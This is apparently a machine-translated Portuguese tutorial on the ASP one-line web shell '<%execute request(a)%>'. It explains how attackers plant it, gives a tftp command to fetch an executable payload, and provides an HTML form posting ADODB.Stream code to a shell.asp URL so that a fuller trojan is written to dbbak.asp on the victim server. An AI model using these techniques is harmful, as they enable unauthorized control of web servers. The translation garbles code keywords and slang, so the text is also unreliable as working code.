O Trojan de uma frase é inserido no arquivo ASP: É claro que o Trojan de uma frase em si é o arquivo ASP. Pode ser acessado usando o IE: Somente se puder ser acessado, poderemos enviar os dados.
Acesso via protocolo HTTP
Em uma frase, o escopo de uso dos Trojans (listei apenas 2 tipos):
1) Somente backup do banco de dados é necessário
Quando o backup do banco de dados é feito em um arquivo asp, nenhum erro de compilação ocorre e o sinalizador de fechamento do script está faltando %>
2) Ao definir permissões SA, você geralmente escreve uma frase primeiro por conveniência (é claro, é mais rápido fazer upload de pombos diretamente via tftp e executá-los)
tftp -i ip obter servidor.exe
O princípio do cavalo de Tróia <%execute request(a)%> em uma frase:
saiba primeiro
A função execute() é usada para executar o código asp. Ela é responsável por executar o cavalo que carregamos e passá-lo para asp.dll para análise. O código acima <%execute request(a)%> pode ser explicado assim:
<%
se solicitação(a)<> então execute solicitação(a)
%>
Se a não estiver vazio, será executado. O que será executado?...
se um! = 0
Vamos dar uma olhada no cliente:
<form action=http://192.168.0.28/shell.asp method=post>
<nome da área de texto=l cols=120 linhas=10 largura=45>
set lP=server.CreateObject(Adodb.Stream) 'Criar componente Adodb.Stream..
lP.Aberto
lP.Tipo=2
lP.CharSet=gb2312
solicitação lP.writetext (p)
lP.SaveToFile server.mappath(dbbak.asp),2
lP.Fechar
definir lP = nada
resposta.redirect dbbak.asp
</textarea>
<textarea name=p cols=120 rows=10 width=45>Dados a serem enviados</textarea><BR><center><br>
<tipo de entrada=enviar valor=enviar>
Adodb.Stream é responsável por enviar os dados lidos para o servidor:
Componente: Adodb.Stream
Existem os seguintes métodos:
Método de cancelamento
Como usar
Objeto.Cancelar
Descrição: cancela a execução de uma chamada de método assíncrona pendente Execute ou Open.
Método WriteText
Como usar:
Object.Write(Dados,[Opções])
Descrição: Carrega os dados de texto especificados no objeto.
Descrição do parâmetro: Dados são o conteúdo especificado a ser gravado.
Opções As opções de gravação, que podem ser deixadas sem especificação. Os parâmetros opcionais são os seguintes:
adWriteChar=0
adWriteLine=1
Método SaveToFile
Como usar:
Object.SaveToFile(NomedoArquivo,[Opções])
Descrição: Grava o conteúdo do objeto no arquivo especificado por FileName
Ou seja, o nome do arquivo onde salvamos o Trojan é dbbak.asp
Descrição do parâmetro: Arquivo especificado por FileName
Opções de acesso às opções, que podem ser deixadas sem especificação. Os parâmetros opcionais são os seguintes:
adSaveCreateNotExist =1
adSaveCreateOverWrite =2
Após enviar um Trojan de frase, o valor de a fica vazio e aguardando um valor escrito. Acessar http://www.***.com/**.asp é o processo de espera. Como se preparar para a execução usando o execute(. ) função.. .
Crie um Adodb.Stream, responsável por escrever nossos dados no servidor...
Ao mesmo tempo, a variável SaveToFile definida por este componente define nosso nome malaio..dbbak.asp
Após enviar ao servidor, a função execute() detecta que o valor de a não está vazio, então executa nossa Malásia!